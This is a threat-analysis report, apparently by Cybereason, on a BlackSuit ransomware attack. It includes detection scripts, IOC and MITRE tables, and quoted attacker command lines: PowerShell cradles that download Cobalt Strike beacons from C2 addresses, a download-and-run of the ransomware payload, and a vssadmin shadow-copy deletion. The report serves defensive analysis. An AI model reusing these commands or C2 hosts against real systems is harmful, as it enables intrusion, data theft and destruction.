BlackSuit: A Hybrid Approach with Data Exfiltration and Encryption

Cybereason Security Services issues Threat Analysis reports to inform on impactful threats. These reports investigate the threats and provide practical recommendations for protecting against them.

In this Threat Analysis report, Cybereason Security Services investigates a BlackSuit ransomware attack we recently observed. The attack represents a significant threat to organizations: it leveraged Cobalt Strike for command and control (C2), rclone for data exfiltration, and the BlackSuit ransomware payload for file encryption.

Key Points

  • In a recent ransomware attack observed by our Security Services team, we noted TTPs specific to the BlackSuit ransomware group.
  • BlackSuit is a ransomware group that emerged in mid-2023 and is widely believed to be a rebrand or spin-off of the Royal ransomware gang, which itself evolved from Conti, a notorious Russian-speaking ransomware group.
  • The BlackSuit ransomware group used Cobalt Strike as its primary attack tool, combined with other tools such as rclone and PsExec, and with Windows components such as RDP and vssadmin.
  • Unlike traditional ransomware attacks, the BlackSuit ransomware group was observed exfiltrating and deleting parts of the targeted data before proceeding with file encryption. This shrinks the amount of data left to encrypt and results in a faster attack flow.
  • The operation was sophisticated and multi-stage, aimed at compromising the target's systems, exfiltrating sensitive data, and encrypting critical files.
  • The BlackSuit ransomware payload was executed with the unusual -nomutex flag, which allows multiple instances to run concurrently.

 

Introduction

Our team recently observed a ransomware attack by the BlackSuit ransomware group that highlighted new methods employed by the threat actor and the impact on the affected organization.

BlackSuit ransomware is a recent evolution of the Royal ransomware family. It leverages a range of tools for lateral movement, data exfiltration, and encryption.


Figure: BlackSuit Execution Flowchart

Returning to public attention in 2024, the BlackSuit ransomware group is an emerging successor to the notorious Royal ransomware. The group has shown sophisticated attack methods that use tools including remote command execution (PsExec.exe), a red-team penetration testing framework (Cobalt Strike), remote access and management (RDP), a command-line tool for syncing and transferring files (rclone), and more. Ransom demands have ranged from roughly $1 million to $10 million USD, usually requested in Bitcoin. Unlike many ransomware groups, BlackSuit does not state the ransom amount in the initial ransom note; the victim must contact the threat actor through a TOR site to negotiate and pay.

TECHNICAL ANALYSIS

During the attack, the BlackSuit ransomware group leveraged Cobalt Strike Beacons for lateral movement and C2 connections, and used the BlackSuit ransomware payload to encrypt data.

Attack Flow Breakdown

The initial access vector for this attack remains unknown, as our observations indicate that the first connections to the affected machines originated from a device without a Cybereason sensor.

Cobalt Strike was the primary attack tool used by the BlackSuit ransomware group. In our investigation, we categorized several behaviors related to Cobalt Strike.

Lateral Movement

BlackSuit ransomware is widely reported to use RDP, SMB, and PsExec.exe to move laterally within the environment. We detected and investigated instances specifically using PsExec.exe and remote procedure calls (RPC), as shown in the screenshot below.

Utilizing PsExec.exe

Cybereason observed PsExec.exe executing remote commands that attempted to copy the Cobalt Strike Beacons vm.dll and vm80.dll into the C:\Windows\Temp folder of other machines in the environment, and then to execute them by calling the exported function ExportFunc64.

Utilizing Remote Procedure Call (RPC) and Other Windows Functions

Cybereason observed execution of Configure-SMRemoting.exe on one of the affected devices; this utility enables Server Manager remote management (WinRM) on the host. Remote services were created over RPC (MS-SCMR RCreateService) with SYSTEM privileges. In addition, multiple binaries with atypical names were executed from a network share; some of them resulted in rundll32.exe injecting code into wuauclt.exe and scanning the whole internal network.

  • \\10.1.xxx.xxx\ADMIN$\frdke23.exe

Five other executables with similarly atypical names were executed in the same way.

Figure: Lateral Movement activity detected in Cybereason EDR

Command and Control (C2)

Cobalt Strike Beacon Downloading 

Cybereason observed PowerShell commands connecting to the C2 IP address 184.174.96[.]71 to download file.ext and save it as vm.dll and vm80.dll. Both files were identified as Cobalt Strike Beacons through file hash reputation.

The executed PowerShell commands were as follows:

  • "PowerShell.exe" invoke-webrequest http://184.174.96[.]71:8002/download/file.ext -OutFile c:\programdata\vm.dll
  • "PowerShell.exe" invoke-webrequest http://184.174.96[.]71:8002/download/file.ext -OutFile c:\programdata\vm80.dll

Malicious Payload Download

Originating from PsExec.exe, PowerShell commands were executed to connect to a compromised internal IP address, download the malicious payload and save it as b.exe; the file was later renamed again. We identified this file as the BlackSuit ransomware payload. Multiple malicious activities such as network scanning and file deletion were also observed; its behavior is discussed further in the Impact section.

  • "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -command "(new-object net.webclient).downloadfile('http://10.1.xxx.xxx:8088/yyy.exe', 'c:\programdata\b.exe'); c:\programdata\b.exe -id LE2OYvCXLI2PIN66LmldgMRLBbcXWb1U -nomutex"

Ransomware typically creates a mutex (CreateMutex) so that only one instance runs and an already-infected host is not encrypted twice; the -nomutex flag disables that check. This suggests a possible shift in tactic, enabling multiple concurrent executions, potentially for redundancy, faster encryption across sessions, or to bypass mutex-based detections and sandbox checks.

Another file was also observed in the environment and used for ransomware-related behavior. It was likewise identified as the BlackSuit ransomware payload, since it shares the same file hash as b.exe.

Second Malicious Payload vmware.dll Downloaded

Originating from suspicious executables in the network share folder (\\10.1.xxx.xxx\ADMIN$\xxx.exe), rundll32.exe was spawned and connected to the C2 IP address 184[.]174[.]96[.]71. Subsequently, PowerShell commands were executed connecting to the C2 IP address 180[.]131[.]145[.]85:8098 to download the malicious payload file.ext and save it as vmware.dll. It was then loaded and executed by rundll32.exe through the command line below:

  • rundll32 vmware.dll,StartW
  • PowerShell command line used: invoke-webrequest hxxp[://]180[.]131[.]145[.]85:8098/download/file[.]ext -OutFile vmware.dll

Impact

LSASS Credential Access and Dumping

Cobalt Strike operators commonly leverage tools such as Mimikatz or CredBandit for credential dumping.

Rundll32.exe was observed connecting to multiple malicious domains/IPs following the naming convention xxx.misstallion[.]com while loading the Cobalt Strike Beacons vm.dll and vm80.dll. It subsequently performed anonymous RWX code injection into wuauclt.exe, which led to LSASS memory being accessed and credential dump files being created.

Figure: LSASS dumping activity detected in Cybereason EDR

Data Exfiltration

rclone.exe, renamed to vmware.exe, was used in this incident. Rclone is a free, open-source command-line tool for copying, syncing, encrypting, and managing files between cloud storage and the local system.

Executed from a network shared folder, a2e6ee5.exe spawned rundll32.exe and cmd.exe and executed vmware.exe (rclone.exe), which connected to multiple C2 domains and IP addresses. We assess this to be the data exfiltration phase of the attack: roughly 60 GB of data was observed in transit.

Figure: Data Exfiltration activity detected in Cybereason EDR

Data Deletion Through vssadmin.exe

PowerShell was observed downloading the malicious payload yyy.exe and saving it as b.exe. b.exe was then executed, conducted network scanning, and invoked vssadmin.exe to delete volume shadow copies. The command line observed is below:

  • Vssadmin.exe /c vssadmin delete shadows /all /quiet

Figure: Data deletion activity detected in Cybereason EDR
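The PowerShell download cradles, the rundll32 export call, the -nomutex flag and the shadow-copy deletion quoted in the sections above share traits that a SOC can match on without relying on file names or hashes, which the attacker changed freely (vm.dll, vm80.dll, b.exe, vmware.dll). The Python script below is an added example written for this article; it is neither Cybereason tooling nor the attacker's code. It runs a small set of behavioral regex rules plus a parent/child check over constructed process events modelled on the command lines above. The internal address 10.1.0.10, the PsExec service-side parent name psexesvc.exe and the benign explorer.exe event are assumptions made for the sample.

```python
import re
from dataclasses import dataclass

# Constructed sample telemetry modelled on the command lines quoted above:
# (parent image, child image, command line). 10.1.0.10 and the benign last
# event are made up for this example.
SAMPLE_EVENTS = [
    ("psexesvc.exe", "PowerShell.exe",
     "PowerShell.exe invoke-webrequest http://184.174.96.71:8002/download/file.ext"
     " -OutFile c:\\programdata\\vm.dll"),
    ("psexesvc.exe", "powershell.exe",
     '"C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe" -ExecutionPolicy Bypass'
     " -command \"(new-object net.webclient).downloadfile('http://10.1.0.10:8088/yyy.exe',"
     " 'c:\\programdata\\b.exe'); c:\\programdata\\b.exe -id LE2OYvCXLI2PIN66LmldgMRLBbcXWb1U -nomutex\""),
    ("frdke23.exe", "rundll32.exe", "rundll32 vmware.dll,StartW"),
    ("b.exe", "vssadmin.exe", "vssadmin.exe delete shadows /all /quiet"),
    ("explorer.exe", "powershell.exe", "powershell.exe Get-ChildItem C:\\Users"),
]

# Each rule is (name, pattern). Patterns target behaviour rather than file
# names, so a renamed payload still trips them.
RULES = [
    ("powershell_download_cradle",
     re.compile(r"invoke-webrequest|\biwr\b|invoke-restmethod|net\.webclient|downloadfile\(|downloadstring\(", re.I)),
    ("powershell_execution_policy_bypass", re.compile(r"-(?:ep|ex\w*)\s+bypass", re.I)),
    ("payload_dropped_in_programdata", re.compile(r"c:\\programdata\\[^\s'\"]+\.(?:dll|exe)", re.I)),
    ("blacksuit_nomutex_flag", re.compile(r"\s-nomutex\b", re.I)),
    # rundll32 loading a DLL by bare name (no path) and calling an export such as StartW
    ("rundll32_bare_dll_export", re.compile(r"rundll32(?:\.exe)?\"?\s+[^\s\\]+\.dll,\w+", re.I)),
    ("shadow_copy_deletion", re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.I)),
]


@dataclass
class Finding:
    child: str
    rule: str
    command_line: str


def scan_events(events):
    """Apply every rule to every event; also flag PsExec's service spawning PowerShell."""
    findings = []
    for parent, child, cmdline in events:
        for name, pattern in RULES:
            if pattern.search(cmdline):
                findings.append(Finding(child, name, cmdline))
        if parent.lower() == "psexesvc.exe" and child.lower().startswith("powershell"):
            findings.append(Finding(child, "psexec_spawned_powershell", cmdline))
    return findings


def triggered_rules(events):
    """Distinct rule names that fired, for a quick triage summary."""
    return sorted({f.rule for f in scan_events(events)})


URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)
DEST_RE = re.compile(r"(?:-outfile\s+|,\s*')([^\s'\")]+)", re.I)


def extract_transfers(cmdline):
    """Pair each download URL with the local path it is written to (ingress tool transfer)."""
    return list(zip(URL_RE.findall(cmdline), DEST_RE.findall(cmdline)))


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f.rule:36} {f.child:16} {f.command_line[:70]}")
    for _, _, cmd in SAMPLE_EVENTS:
        for url, dest in extract_transfers(cmd):
            print("transfer:", url, "->", dest)
```

Two of the rules deserve a note. The ProgramData rule fires on both beacons and the ransomware payload because the actor consistently staged into c:\programdata; that is cheap to change, so it should carry less weight than the cradle and vssadmin rules. The rundll32 rule keys on a DLL passed by bare name, which is how vmware.dll was loaded; legitimate rundll32 usage almost always gives a full path. extract_transfers gives the URL/destination pairs that belong in the T1105 row of the incident timeline.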

File Enumeration and Encryption Logic

After the backups were deleted, BlackSuit ransomware set its exclusion list (the files and directories spared from encryption). The following file extensions and file names are excluded from encryption:

  • .BlackSuit
  • .exe
  • .dll
  • README.BlackSuit.txt

Figure: Code snippet of file enumeration and encryption logic

It also avoids encrypting critical system directories and administrative network shares, likely to reduce the risk of breaking system functionality:

  • Windows (prevents encrypting system files)
  • IPC$ (avoids breaking inter-process communication over SMB named pipes)
  • ADMIN$ (prevents issues with the administrative share)
Figure: Code snippet of checking other exclusions
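The two exclusion checks above decide which files the payload touches, and that has a practical consequence for defenders who plant canary files. The Python below is an added example that re-implements the described logic over an in-memory file listing so it can be run offline; it is not the ransomware's code, and it assumes (as a reading of the snippets, not something the page states) that "Windows" is matched as the first directory under the drive and that IPC$ and ADMIN$ are matched as the share component of a UNC path. The host, share and file names in the sample listing are constructed.

```python
import ntpath

# Exclusion list as described above. All comparisons are case-insensitive.
EXCLUDED_EXTENSIONS = {".blacksuit", ".exe", ".dll"}
EXCLUDED_FILENAMES = {"readme.blacksuit.txt"}
EXCLUDED_TOP_DIRS = {"windows"}        # assumption: matched as first directory under the drive
EXCLUDED_SHARES = {"ipc$", "admin$"}   # assumption: matched as the share name of a UNC path


def is_excluded(path: str) -> bool:
    """Return True if the enumeration logic would skip this file."""
    drive, tail = ntpath.splitdrive(path.lower())   # 'c:' or '\\\\host\\share'
    parts = [p for p in tail.split("\\") if p]
    name = parts[-1] if parts else ""
    if name in EXCLUDED_FILENAMES:
        return True
    if ntpath.splitext(name)[1] in EXCLUDED_EXTENSIONS:
        return True
    if drive.startswith("\\\\") and drive.rsplit("\\", 1)[-1] in EXCLUDED_SHARES:
        return True
    if len(parts) > 1 and parts[0] in EXCLUDED_TOP_DIRS:
        return True
    return False


def select_targets(paths):
    """Files the ransomware would go on to encrypt, in listing order."""
    return [p for p in paths if not is_excluded(p)]


# Constructed file listing; 10.1.0.10 and the share names are invented for the example.
SAMPLE_FILES = [
    r"C:\Windows\System32\drivers\etc\hosts",
    r"C:\Users\finance\Q3-forecast.xlsx",
    r"C:\Users\finance\README.BlackSuit.txt",
    r"C:\Users\finance\archive.BlackSuit",
    r"C:\Program Files\App\app.exe",
    r"C:\Program Files\App\helper.dll",
    r"D:\Shares\HR\salaries.csv",
    r"\\10.1.0.10\ADMIN$\frdke23.exe",
    r"\\10.1.0.10\IPC$\pipe\spoolss",
    r"\\10.1.0.10\Finance$\ledger.db",
]

if __name__ == "__main__":
    for p in SAMPLE_FILES:
        print("skip   " if is_excluded(p) else "encrypt", p)
```

Two things fall out of running it. A canary file with a .exe or .dll extension, or one already named README.BlackSuit.txt, would never be touched, so canaries meant to trip on this family should carry ordinary document extensions and live in user directories or on file shares. And only ADMIN$ and IPC$ are spared: a hidden data share such as the sample's Finance$ is enumerated and encrypted like any other.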

Encryption of Data and Leaving Ransom Notes

BlackSuit ransomware is known for combining data exfiltration and deletion with encryption, whereas traditional ransomware focuses on encryption alone. The payload also supports partial encryption, which lets the threat actor choose what percentage of each file to encrypt; encrypting less data helps evade detection and significantly speeds up the ransomware.

From the BlackSuit ransomware payload, we were able to detect file events that indicate encryption behavior and ransom notes creation. 

Figure: Encrypted file events detected in Cybereason EDR

Figure: Code snippet of string preparation for the ransom note

This function copies the wide string "README.BlackSuit.txt" (20 characters) into an internal buffer, preparing the file name under which the ransom note will be dropped.

Figure: Code snippet of the hardcoded ransom note

This function stores the ransom message body in cleartext and registers a cleanup or exit routine. It is likely called after the ransom file name has been set (README.BlackSuit.txt, from the earlier function) and is part of the setup routine for dropping the ransom note on disk.

Conclusion

This BlackSuit ransomware attack demonstrated a sophisticated and multi-stage operation aimed at compromising the target's systems, exfiltrating sensitive data, and encrypting critical files.

As part of the data exfiltration phase, the attacker leveraged a renamed version of the legitimate rclone utility to covertly transfer sensitive files to a remote location, thereby compromising confidentiality. This step highlighted the attacker’s ability to blend malicious activity with legitimate processes, making detection more challenging.

This attack underscores the importance of robust security measures, including network segmentation and vigilance against the abuse of legitimate tools for malicious purposes. A comprehensive security strategy is essential to prevent and mitigate the impact of such advanced threats.

IOC | IOC Type | Description
d53f5c10f07d4610a0fa1b6a8638648e4ab5370377364a2cc7aff4bb75c4d71b | SHA-256 | vm80.dll, Cobalt Strike Beacon
69a20bae02480e03cb36e26729ed4a74c613eee5ba8c44396655da84a851fd03 | SHA-256 | vm.dll, Cobalt Strike Beacon
0112e3b20872760dda5f658f6b546c85f126e803e27f0577b294f335ffa5a298 | SHA-256 | rclone.exe disguised as vmware.exe; used for data exfiltration in the incident
180[.]131[.]145[.]85 | IP address | C2 IP address
82[.]192[.]88[.]95 | IP address | C2 IP address
88[.]119[.]175[.]194 | IP address | C2 IP address
184[.]174[.]96[.]71 | IP address | C2 IP address
misstallion[.]com | Domain | C2 domain
store[.]misstallion[.]com | Domain | C2 domain
mail[.]misstallion[.]com | Domain | C2 domain
beamofthemoon[.]com | Domain | C2 domain
store[.]beamofthemoon[.]com | Domain | C2 domain
mail[.]beamofthemoon[.]com | Domain | C2 domain
kiddlanka[.]com | Domain | C2 domain
mail[.]kiddlanka[.]com | Domain | C2 domain
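The indicators in the table are published defanged, and the rundll32 C2 traffic was seen going to hosts of the form xxx.misstallion[.]com rather than only the bare domains listed. The Python below is an added example for this article (not Cybereason tooling) that refangs the table's indicators and sweeps constructed DNS, proxy and file-hash log lines for them, matching any subdomain of a listed C2 domain. The log format, timestamps, client addresses and the host name FS01 are invented for the sample.

```python
import re

# Indicators from the IOC table above, kept in defanged form; refang() restores them.
DEFANGED_NETWORK_IOCS = {
    "184[.]174[.]96[.]71": "C2 IP address",
    "180[.]131[.]145[.]85": "C2 IP address",
    "82[.]192[.]88[.]95": "C2 IP address",
    "88[.]119[.]175[.]194": "C2 IP address",
    "misstallion[.]com": "C2 domain",
    "beamofthemoon[.]com": "C2 domain",
    "kiddlanka[.]com": "C2 domain",
}
FILE_HASHES = {
    "d53f5c10f07d4610a0fa1b6a8638648e4ab5370377364a2cc7aff4bb75c4d71b": "Cobalt Strike Beacon (vm80.dll)",
    "69a20bae02480e03cb36e26729ed4a74c613eee5ba8c44396655da84a851fd03": "Cobalt Strike Beacon (vm.dll)",
    "0112e3b20872760dda5f658f6b546c85f126e803e27f0577b294f335ffa5a298": "rclone.exe renamed to vmware.exe",
}


def refang(ioc: str) -> str:
    """Undo the [.] / [://] / hxxp defanging conventions used in the report."""
    return ioc.replace("[.]", ".").replace("[://]", "://").replace("hxxp", "http")


IPS = {refang(k): v for k, v in DEFANGED_NETWORK_IOCS.items() if v.endswith("IP address")}
DOMAINS = {refang(k): v for k, v in DEFANGED_NETWORK_IOCS.items() if v.endswith("domain")}

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)
SHA256_RE = re.compile(r"\b[0-9a-f]{64}\b", re.I)


def domain_hit(host: str):
    """Description if host is a listed C2 domain or any subdomain of one, else None."""
    host = host.lower()
    for domain, desc in DOMAINS.items():
        if host == domain or host.endswith("." + domain):
            return desc
    return None


def scan_lines(lines):
    """Return (line number, matched indicator, description) for every hit, in log order."""
    hits = []
    for n, line in enumerate(lines, 1):
        for ip in IP_RE.findall(line):
            if ip in IPS:
                hits.append((n, ip, IPS[ip]))
        for host in HOST_RE.findall(line):
            desc = domain_hit(host)
            if desc:
                hits.append((n, host.lower(), desc))
        for digest in SHA256_RE.findall(line):
            if digest.lower() in FILE_HASHES:
                hits.append((n, digest.lower(), FILE_HASHES[digest.lower()]))
    return hits


# Constructed sample log lines; only lines 1, 2 and 4 contain an indicator.
SAMPLE_LOGS = [
    "2025-06-01T10:02:11Z dns client=10.1.0.25 query=mail.misstallion.com type=A",
    "2025-06-01T10:02:12Z proxy src=10.1.0.25 dst=184.174.96.71:8002 GET /download/file.ext",
    "2025-06-01T10:05:40Z dns client=10.1.0.31 query=update.microsoft.com type=A",
    "2025-06-01T10:09:03Z file host=FS01 image=C:\\ProgramData\\vmware.exe"
    " sha256=0112E3B20872760DDA5F658F6B546C85F126E803E27F0577B294F335FFA5A298",
]

if __name__ == "__main__":
    for n, ioc, desc in scan_lines(SAMPLE_LOGS):
        print(f"line {n}: {ioc} -> {desc}")
```

Suffix matching on the three registrable domains is what makes the sweep useful: it catches mail. and store. hosts whether or not they appear in the table. The hash matches are the most brittle of the three indicator types, since a recompiled beacon or a fresh rclone build changes them without changing the behavior described in the Data Exfiltration section.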


Tactic | Techniques / Sub-Techniques | Summary
TA0002-Execution | T1059.001 - Command and Scripting Interpreter: PowerShell | PowerShell downloading Cobalt Strike Beacons and other malicious payloads
TA0008-Lateral Movement | T1021.002 - Remote Services: SMB/Windows Admin Shares | Lateral movement via psexec.exe
TA0008-Lateral Movement | T1569.002 - System Services: Service Execution | Lateral movement via psexec.exe
TA0008-Lateral Movement | T1021 - Remote Services | Lateral movement via RPC (MS-SCMR remote service creation)
TA0008-Lateral Movement | T1021.001 - Remote Services: Remote Desktop Protocol; T1098 - Account Manipulation | Adds an existing user (Administrator) to the Remote Desktop Users group, enabling RDP access
TA0007-Discovery | T1082 - System Information Discovery | Gathering details about installed software, specifically security products
TA0005-Defense Evasion | T1562.001 - Impair Defenses: Disable or Modify Tools | Uninstalls a product (probably security software)
TA0011-Command and Control | T1105 - Ingress Tool Transfer | PowerShell downloading Cobalt Strike Beacons (vmware.dll, vm.dll, vm80.dll), xxx.exe, yyy.exe and other payloads
TA0006-Credential Access | T1003.001 - OS Credential Dumping: LSASS Memory | Cobalt Strike Beacon leading to LSASS credential access and dumping
TA0010-Exfiltration | T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage | Data exfiltration through rclone.exe (renamed vmware.exe)
TA0007-Discovery | T1083 - File and Directory Discovery | Enumerates files for encryption while skipping system directories and network shares ("Windows", "IPC$", "ADMIN$")
TA0040-Impact | T1490 - Inhibit System Recovery | Deletes Volume Shadow Copies (vssadmin.exe) to prevent recovery
TA0040-Impact | T1486 - Data Encrypted for Impact | Data encryption by the BlackSuit ransomware payload

Mahadev Joshi
Senior Security Analyst, Cybereason Global SOC
Mahadev Joshi is a Security Analyst with the Cybereason Global SOC team. He is passionate about cybersecurity and malware analysis, with a focus on understanding and countering advanced threats, and is eager to keep learning and stay ahead of emerging threats. Mahadev has a Bachelor of Science in Information Technology.

 

Kengwei Lin
Senior Security Analyst, Cybereason Global SOC
Kengwei Lin is a Security Analyst with the Cybereason Global SOC team, where he investigates security events daily. Passionate about incident investigation and response, he is keen to learn de-obfuscation and decoding techniques, malware TTPs, and other cybersecurity trends.

Cybereason Security Services Team